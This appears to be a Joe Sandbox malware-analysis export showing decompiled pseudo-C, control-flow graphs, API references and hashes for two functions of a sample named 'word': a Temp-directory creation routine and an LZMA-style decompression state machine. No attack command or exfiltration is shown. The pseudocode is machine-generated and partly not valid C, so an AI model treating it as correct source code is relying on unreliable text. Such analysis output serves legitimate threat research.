                                    control_flow_graph 568 405b99-405be4 CreateDirectoryW 569 405be6-405be8 568->569 570 405bea-405bf7 GetLastError 568->570 571 405c11-405c13 569->571 570->571 572 405bf9-405c0d SetFileSecurityW 570->572 572->569 573 405c0f GetLastError 572->573 573->571
                                    C-Code - Quality: 100%
                                    			E00405B99(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                    0x00405ba4
                                    0x00405ba8
                                    0x00405bab
                                    0x00405bb1
                                    0x00405bb5
                                    0x00405bb9
                                    0x00405bc1
                                    0x00405bc8
                                    0x00405bce
                                    0x00405bd5
                                    0x00405bdc
                                    0x00405be4
                                    0x00405be6
                                    0x00000000
                                    0x00405be6
                                    0x00405bf0
                                    0x00405bf7
                                    0x00405c0d
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00405c0f
                                    0x00405c13

                                    APIs
                                    • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                    • GetLastError.KERNEL32 ref: 00405BF0
                                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                    • GetLastError.KERNEL32 ref: 00405C0F
                                    Strings
                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                    • API String ID: 3449924974-4017390910
                                    • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                    • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                    • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                    • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00406BB0 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 198COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 574 406bb0-406bd3 575 406bd5-406bd8 574->575 576 406bdd-406be0 574->576 577 4075fd-407601 575->577 578 406be3-406bec 576->578 579 406bf2 578->579 580 4075fa 578->580 581 406bf9-406bfd 579->581 582 406d39-4073e0 579->582 583 406c9e-406ca2 579->583 584 406d0e-406d12 579->584 580->577 585 406c03-406c10 581->585 586 4075e5-4075f8 581->586 592 4073e2-4073f8 582->592 593 4073fa-407410 582->593 590 406ca8-406cc1 583->590 591 40754e-407558 583->591 587 406d18-406d2c 584->587 588 40755d-407567 584->588 585->580 594 406c16-406c5c 585->594 586->577 595 406d2f-406d37 587->595 588->586 596 406cc4-406cc8 590->596 591->586 597 407413-40741a 592->597 593->597 598 406c84-406c86 594->598 599 406c5e-406c62 594->599 595->582 595->584 596->583 600 406cca-406cd0 596->600 603 407441-40744d 597->603 604 40741c-407420 597->604 607 406c94-406c9c 598->607 608 406c88-406c92 598->608 605 406c64-406c67 GlobalFree 599->605 606 406c6d-406c7b GlobalAlloc 599->606 601 406cd2-406cd9 600->601 602 406cfa-406d0c 600->602 609 406ce4-406cf4 GlobalAlloc 601->609 610 406cdb-406cde GlobalFree 601->610 602->595 603->578 611 407426-40743e 604->611 612 4075cf-4075d9 604->612 605->606 606->580 614 406c81 606->614 607->596 608->607 608->608 609->580 609->602 610->609 611->603 612->586 614->598
                                    C-Code - Quality: 98%
                                    			E00406BB0(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
